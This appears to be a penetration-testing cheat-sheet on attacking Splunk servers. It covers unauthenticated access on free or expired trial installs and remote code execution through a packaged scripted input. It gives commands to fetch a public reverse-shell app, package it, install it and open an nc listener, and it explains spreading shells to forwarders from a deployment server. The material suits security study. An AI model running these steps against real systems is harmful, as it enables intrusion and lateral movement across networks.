Splunk

Port 8000 and 8089 (Splunkd httpd service)

Enumeration

Splunk enterprise trial will revert to free version after 60 days that doesnt require authentication

Exploitation

Code Execution

server-side Django applications, REST endpoints, scripted inputs, and alerting scripts. A common method of gaining remote code execution on a Splunk server is through the use of a scripted input. These are designed to help integrate Splunk with data sources such as APIs or file servers that require custom methods to access. Scripted inputs are intended to run these scripts, with STDOUT provided as input to Splunk.

GitHub - 0xjpuff/reverse_shell_splunk: A simple splunk package for obtaining reverse shells on both Windows and most *nix systems.GitHub

1. Create the zip file

$ wget https://github.com/0xjpuff/reverse_shell_splunk
$ cd reverse_shell_splunk
$ # edit the rev.py and rev.ps1 inside bin folder
$ tar -cvzf updater.tar.gz reverse_shell_splunk/

1. Login -> Install app from file

2. Setup a listener

$ sudo nc -lnvp 443

Note: if we are attacking linux, we need to edit rev.py

If the compromised Splunk host is a deployment server, it will likely be possible to achieve RCE on any hosts with Universal Forwarders installed on them. To push a reverse shell out to other hosts, the application must be placed in the $SPLUNK_HOME/etc/deployment-apps directory on the compromised host. In a Windows-heavy environment, we will need to create an application using a PowerShell reverse shell since the Universal forwarders do not install with Python like the Splunk server.